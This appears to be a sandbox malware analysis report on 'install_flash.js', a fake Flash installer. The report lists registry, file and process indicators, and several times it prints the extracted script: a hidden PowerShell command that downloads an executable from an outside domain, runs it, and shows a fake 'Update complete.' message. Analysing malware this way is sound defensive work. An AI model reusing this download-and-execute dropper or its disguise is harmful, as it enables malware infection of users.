Incident Response

Risk Assessment

Fingerprint
Reads the active computer name
Reads the cryptographic machine GUID

Indicators

  • Suspicious Indicators 11

  • Anti-Detection/Stealthiness
  • Environment Awareness
    • Reads the active computer name
      details
      "wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
      source
      Registry Access
      relevance
      5/10
    • Reads the cryptographic machine GUID
      details
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
      source
      Registry Access
      relevance
      10/10
  • General
  • Installation/Persistence
    • Touches files in the Windows directory
      details
      "wscript.exe" touched file "%WINDIR%\System32\en-US\WScript.exe.mui"
      "wscript.exe" touched file "C:\Windows\System32\WScript.exe"
      "wscript.exe" touched file "C:\Windows\Globalization\Sorting\sortdefault.nls"
      "wscript.exe" touched file "C:\Windows\system32\rsaenh.dll"
      "wscript.exe" touched file "C:\Windows\system32\wshom.ocx"
      "wscript.exe" touched file "C:\Windows\System32\OLEACCRC.DLL"
      "wscript.exe" touched file "C:\Windows\System32"
      "wscript.exe" touched file "C:\Windows\System32\WindowsPowerShell"
      "wscript.exe" touched file "C:\Windows\System32\WindowsPowerShell\v1.0"
      "wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
      "wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
      "wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
      "wscript.exe" touched file "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      source
      API Call
      relevance
      7/10
  • System Security
    • Modifies proxy settings
      details
      "wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
      "wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
      source
      Registry Access
      relevance
      10/10
    • Queries sensitive IE security settings
      details
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
      source
      Registry Access
      relevance
      8/10
    • Queries the display settings of system associated file extensions
      details
      "wscript.exe" (Access type: "QUERYVAL"; Path: "HKCR\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE"; Key: "ALWAYSSHOWEXT")
      "wscript.exe" (Access type: "QUERYVAL"; Path: "HKCR\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE"; Key: "NEVERSHOWEXT")
      source
      Registry Access
      relevance
      7/10
  • Unusual Characteristics
    • Reads information about supported languages
      details
      "wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE"; Key: "EN-US")
      "wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\EXTENDEDLOCALE"; Key: "EN-US")
      "wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
      source
      Registry Access
      relevance
      3/10
  • Informative 9

  • General
    • Creates mutants
      details
      "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
      "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
      "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
      "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
      source
      Created Mutant
      relevance
      3/10
    • Extracted beautified JavaScript
      details
      Beautified JS: "a = new ActiveXObject('Wscript.Shell');
      a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)", 0, false);"
      source
      Static Parser
      relevance
      5/10
    • Loads the .NET runtime environment
      details
      "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll" at 6AAA0000
      source
      Loaded Module
    • Reads Windows Trust Settings
      details
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
      source
      Registry Access
      relevance
      5/10
    • Spawns new processes
      details
      Spawned process "powershell.exe" with commandline "-WindowStyle Hidden $d=$env:temp+'\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)" (Show Process)
      source
      Monitored Target
      relevance
      3/10
  • Installation/Persistence
    • Connects to LPC ports
      details
      "wscript.exe" connecting to "\ThemeApiPort"
      source
      API Call
      relevance
      1/10
    • Dropped files
      details
      "U35A9ZJJNQNW4QIIY9TP.temp" has type "data"
      source
      Binary File
      relevance
      3/10
  • Network Related
  • System Security

File Details

All Details:

install_flash.js

Filename
install_flash.js
Size
490B (490 bytes)
Type
script javascript
Description
ASCII text, with very long lines, with CRLF line terminators
Architecture
WINDOWS
SHA256
0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f
MD5
3bd92cbe8d3a95aac3774be884225a9a
SHA1
5caf6c074a48df5c2f8a49a7efd8039f42f03b21

Hybrid Analysis

Analysed 2 processes in total (System Resource Monitor).

  • wscript.exe "C:\0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js" (PID: 2812)
    • powershell.exe -WindowStyle Hidden $d=$env:temp+'\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information) (PID: 2780)

Network Analysis

DNS Requests

No relevant DNS requests were made.

Contacted Hosts

No relevant hosts were contacted.

HTTP Traffic

No relevant HTTP requests were made.

Extracted Strings

All Details:
"C:\0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js"
Ansi based on Process Commandline (wscript.exe)
$Function
Unicode based on Runtime Data (wscript.exe )
-WindowStyle Hidden $d=$env:temp+'\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)
Ansi based on Process Commandline (powershell.exe)
\Sessions\1\Windows\ApiPort
Unicode based on Runtime Data (wscript.exe )
\ThemeApiPort
Unicode based on Runtime Data (wscript.exe )
_,,,,qJ,,,
Ansi based on Image Processing (screen_0.png)
__,,q?___m,_,_,_q,_??_??_v?_,?,,
Ansi based on Image Processing (screen_0.png)
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
`\??\Volume{8177f4e8-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (wscript.exe )
a = new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)", 0, false);
Ansi based on Memory/File Scan (0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f)
a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
Ansi based on Hybrid Analysis (0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js.bin)
AlwaysShowExt
Unicode based on Runtime Data (wscript.exe )
AppendPath
Unicode based on Runtime Data (wscript.exe )
Attributes
Unicode based on Runtime Data (wscript.exe )
AuthenticodeEnabled
Unicode based on Runtime Data (wscript.exe )
AutoCheckSelect
Unicode based on Runtime Data (wscript.exe )
AutoDetect
Unicode based on Runtime Data (wscript.exe )
BrowseInPlace
Unicode based on Runtime Data (wscript.exe )
CallForAttributes
Unicode based on Runtime Data (wscript.exe )
CEIPEnable
Unicode based on Runtime Data (wscript.exe )
Com+Enabled
Unicode based on Runtime Data (wscript.exe )
COM+Enabled
Unicode based on Runtime Data (wscript.exe )
ComputerName
Unicode based on Runtime Data (wscript.exe )
Content Type
Unicode based on Runtime Data (wscript.exe )
CreateUriCacheSize
Unicode based on Runtime Data (wscript.exe )
CWDIllegalInDLLSearch
Unicode based on Runtime Data (wscript.exe )
DebugHeapFlags
Unicode based on Runtime Data (wscript.exe )
DefaultLevel
Unicode based on Runtime Data (wscript.exe )
DelegateExecute
Unicode based on Runtime Data (wscript.exe )
Description
Unicode based on Runtime Data (wscript.exe )
DevicePath
Unicode based on Runtime Data (wscript.exe )
DiagLevel
Unicode based on Runtime Data (wscript.exe )
DiagMatchAnyMask
Unicode based on Runtime Data (wscript.exe )
DisableImprovedZoneCheck
Unicode based on Runtime Data (wscript.exe )
DisableLocalOverride
Unicode based on Runtime Data (wscript.exe )
DisableMetaFiles
Unicode based on Runtime Data (wscript.exe )
DisableSecuritySettingsCheck
Unicode based on Runtime Data (wscript.exe )
DisableUserModeCallbackFilter
Unicode based on Runtime Data (wscript.exe )
DocObject
Unicode based on Runtime Data (wscript.exe )
DontPrettyPath
Unicode based on Runtime Data (wscript.exe )
DriveMask
Unicode based on Runtime Data (wscript.exe )
EnablePunycode
Unicode based on Runtime Data (wscript.exe )
FipsAlgorithmPolicy
Unicode based on Runtime Data (wscript.exe )
FolderTypeID
Unicode based on Runtime Data (wscript.exe )
Generation
Unicode based on Runtime Data (wscript.exe )
GlobalSession
Unicode based on Runtime Data (wscript.exe )
HasNavigationEnum
Unicode based on Runtime Data (wscript.exe )
HideFileExt
Unicode based on Runtime Data (wscript.exe )
HideFolderVerbs
Unicode based on Runtime Data (wscript.exe )
HideIcons
Unicode based on Runtime Data (wscript.exe )
HideInWebView
Unicode based on Runtime Data (wscript.exe )
HideOnDesktopPerUser
Unicode based on Runtime Data (wscript.exe )
IconsOnly
Unicode based on Runtime Data (wscript.exe )
IgnoreUserSettings
Unicode based on Runtime Data (wscript.exe )
Image Path
Unicode based on Runtime Data (wscript.exe )
InitFolderHandler
Unicode based on Runtime Data (wscript.exe )
InprocServer32
Unicode based on Runtime Data (wscript.exe )
IntranetName
Unicode based on Runtime Data (wscript.exe )
IsShortcut
Unicode based on Runtime Data (wscript.exe )
LdapClientIntegrity
Unicode based on Runtime Data (wscript.exe )
LoadAppInit_DLLs
Unicode based on Runtime Data (wscript.exe )
LoadWithoutCOM
Unicode based on Runtime Data (wscript.exe )
LocalizedName
Unicode based on Runtime Data (wscript.exe )
LocalRedirectOnly
Unicode based on Runtime Data (wscript.exe )
LogFileName
Unicode based on Runtime Data (wscript.exe )
LogSecuritySuccesses
Unicode based on Runtime Data (wscript.exe )
MachineGuid
Unicode based on Runtime Data (wscript.exe )
MachinePreferredUILanguages
Unicode based on Runtime Data (wscript.exe )
MachineThrottling
Unicode based on Runtime Data (wscript.exe )
MapNetDriveVerbs
Unicode based on Runtime Data (wscript.exe )
MapNetDrvBtn
Unicode based on Runtime Data (wscript.exe )
MartaExtension
Unicode based on Runtime Data (wscript.exe )
MaximizeApps
Unicode based on Runtime Data (wscript.exe )
MaxRpcSize
Unicode based on Runtime Data (wscript.exe )
MaxSxSHashCount
Unicode based on Runtime Data (wscript.exe )
NdrOleExtDLL
Unicode based on Runtime Data (wscript.exe )
NeverShowExt
Unicode based on Runtime Data (wscript.exe )
NoFileFolderJunction
Unicode based on Runtime Data (wscript.exe )
NoNetCrawling
Unicode based on Runtime Data (wscript.exe )
NoWorkingDirectory
Unicode based on Runtime Data (wscript.exe )
OOBEInProgress
Unicode based on Runtime Data (wscript.exe )
PageAllocatorSystemHeapIsPrivate
Unicode based on Runtime Data (wscript.exe )
PageAllocatorUseSystemHeap
Unicode based on Runtime Data (wscript.exe )
ParentFolder
Unicode based on Runtime Data (wscript.exe )
ParsingName
Unicode based on Runtime Data (wscript.exe )
PinToNameSpaceTree
Unicode based on Runtime Data (wscript.exe )
PolicyScope
Unicode based on Runtime Data (wscript.exe )
PowerShell"*
Unicode based on Runtime Data (wscript.exe )
PowerShell.exe
Unicode based on Runtime Data (wscript.exe )
PreCreate
Unicode based on Runtime Data (wscript.exe )
PreferExternalManifest
Unicode based on Runtime Data (wscript.exe )
PreferredUILanguages
Unicode based on Runtime Data (wscript.exe )
PrivateKeyLifetimeSeconds
Unicode based on Runtime Data (wscript.exe )
PrivKeyCacheMaxItems
Unicode based on Runtime Data (wscript.exe )
PrivKeyCachePurgeIntervalSeconds
Unicode based on Runtime Data (wscript.exe )
ProfileImagePath
Unicode based on Runtime Data (wscript.exe )
ProxyBypass
Unicode based on Runtime Data (wscript.exe )
PublishExpandedPath
Unicode based on Runtime Data (wscript.exe )
QueryForInfoTip
Unicode based on Runtime Data (wscript.exe )
QueryForOverlay
Unicode based on Runtime Data (wscript.exe )
RelativePath
Unicode based on Runtime Data (wscript.exe )
RemoteRpcDll
Unicode based on Runtime Data (wscript.exe )
RestrictedAttributes
Unicode based on Runtime Data (wscript.exe )
RuleCount
Unicode based on Runtime Data (wscript.exe )
SafeDllSearchMode
Unicode based on Runtime Data (wscript.exe )
SafeProcessSearchMode
Unicode based on Runtime Data (wscript.exe )
SaferFlags
Unicode based on Runtime Data (wscript.exe )
Safety Warning Level
Unicode based on Runtime Data (wscript.exe )
Security_HKLM_only
Unicode based on Runtime Data (wscript.exe )
SeparateProcess
Unicode based on Runtime Data (wscript.exe )
SetWorkingDirectoryFromTarget
Unicode based on Runtime Data (wscript.exe )
ShellState
Unicode based on Runtime Data (wscript.exe )
ShowCompColor
Unicode based on Runtime Data (wscript.exe )
ShowInfoTip
Unicode based on Runtime Data (wscript.exe )
ShowSuperHidden
Unicode based on Runtime Data (wscript.exe )
ShowTypeOverlay
Unicode based on Runtime Data (wscript.exe )
SourcePath
Unicode based on Runtime Data (wscript.exe )
SpecialFoldersCacheSize
Unicode based on Runtime Data (wscript.exe )
StreamResource
Unicode based on Runtime Data (wscript.exe )
StreamResourceType
Unicode based on Runtime Data (wscript.exe )
SuppressionPolicy
Unicode based on Runtime Data (wscript.exe )
SystemSetupInProgress
Unicode based on Runtime Data (wscript.exe )
ThemeApiConnectionRequest
Unicode based on Runtime Data (wscript.exe )
ThreadingModel
Unicode based on Runtime Data (wscript.exe )
TransparentEnabled
Unicode based on Runtime Data (wscript.exe )
TrustPolicy
Unicode based on Runtime Data (wscript.exe )
UNCAsIntranet
Unicode based on Runtime Data (wscript.exe )
UseDropHandler
Unicode based on Runtime Data (wscript.exe )
UseHostnameAsAlias
Unicode based on Runtime Data (wscript.exe )
UseOldHostResolutionOrder
Unicode based on Runtime Data (wscript.exe )
UseWINSAFER
Unicode based on Runtime Data (wscript.exe )
WantsAliasedNotifications
Unicode based on Runtime Data (wscript.exe )
WantsFORDISPLAY
Unicode based on Runtime Data (wscript.exe )
WantsFORPARSING
Unicode based on Runtime Data (wscript.exe )
WantsParseDisplayName
Unicode based on Runtime Data (wscript.exe )
WantsUniversalDelegate
Unicode based on Runtime Data (wscript.exe )
WindowsPowerShell
Unicode based on Runtime Data (wscript.exe )
WScript.exe
Unicode based on Runtime Data (wscript.exe )
{031E4825-7B94-4DC3-B131-E946B44C8DD5}
Unicode based on Runtime Data (wscript.exe )
{04731B67-D933-450A-90E6-4ACD2E9408FE}
Unicode based on Runtime Data (wscript.exe )
{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
Unicode based on Runtime Data (wscript.exe )
{11016101-E366-4D22-BC06-4ADA335C892B}
Unicode based on Runtime Data (wscript.exe )
{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}
Unicode based on Runtime Data (wscript.exe )
{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
Unicode based on Runtime Data (wscript.exe )
{208D2C60-3AEA-1069-A2D7-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{26EE0668-A00A-44D7-9371-BEB064C98683}
Unicode based on Runtime Data (wscript.exe )
{4336A54D-038B-4685-AB02-99BB52D3FB8B}
Unicode based on Runtime Data (wscript.exe )
{450D8FBA-AD25-11D0-98A8-0800361B1103}
Unicode based on Runtime Data (wscript.exe )
{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
Unicode based on Runtime Data (wscript.exe )
{59031A47-3F72-44A7-89C5-5595FE6B30EE}
Unicode based on Runtime Data (wscript.exe )
{645FF040-5081-101B-9F08-00AA002F954E}
Unicode based on Runtime Data (wscript.exe )
{871C5380-42A0-1069-A2EA-08002B30309D}
Unicode based on Runtime Data (wscript.exe )
{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
Unicode based on Runtime Data (wscript.exe )
{89D83576-6BD1-4C86-9454-BEB04E94C819}
Unicode based on Runtime Data (wscript.exe )
{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}
Unicode based on Runtime Data (wscript.exe )
{9343812E-1C37-4A49-A12E-4B2D810D956B}
Unicode based on Runtime Data (wscript.exe )
{98D99750-0B8A-4C59-9151-589053683D73}
Unicode based on Runtime Data (wscript.exe )
{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}
Unicode based on Runtime Data (wscript.exe )
{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}
Unicode based on Runtime Data (wscript.exe )
{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}
Unicode based on Runtime Data (wscript.exe )
{E345F35F-9397-435C-8F95-4E922C26259E}
Unicode based on Runtime Data (wscript.exe )
{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
Unicode based on Runtime Data (wscript.exe )
{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
Unicode based on Runtime Data (wscript.exe )
{F3F5824C-AD58-4728-AF59-A1EBE3392799}
Unicode based on Runtime Data (wscript.exe )
Unicode based on Runtime Data (wscript.exe )
WantsAliasedNotifications
Unicode based on Runtime Data (wscript.exe )
WantsFORDISPLAY
Unicode based on Runtime Data (wscript.exe )
WantsFORPARSING
Unicode based on Runtime Data (wscript.exe )
WantsParseDisplayName
Unicode based on Runtime Data (wscript.exe )
WantsUniversalDelegate
Unicode based on Runtime Data (wscript.exe )
WindowsPowerShell
Unicode based on Runtime Data (wscript.exe )
WScript.exe
Unicode based on Runtime Data (wscript.exe )
-WindowStyle Hidden $d=$env:temp+'\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)
Ansi based on Process Commandline (powershell.exe)
a = new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)", 0, false);
Ansi based on Memory/File Scan (0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f)
a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1bfa2cdda4c080ad394407b7cd318b1c.exe';(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
Ansi based on Hybrid Analysis (0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f.js.bin)

Extracted Files

  • Informative 1

    • U35A9ZJJNQNW4QIIY9TP.temp
      Size
      7.8KiB (8016 bytes)
      Type
      data
      Runtime Process
      powershell.exe (PID: 2780)
      MD5
      d0dd64c23437e70a885ade12b5fef6d0
      SHA1
      34ec91a8d43810a833cd4bed385fc44d7a968914
      SHA256
      c756948173fac26e5da3da10f1f5d0a0ba789b3fc02fb46de15d51177b1a3213

Notifications

  • Runtime

  • Sample was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/0a85c898dc8c3a0b2ff3989295922eb91dd6707e83193168624312198208578f/analysis/1469116037/")

Community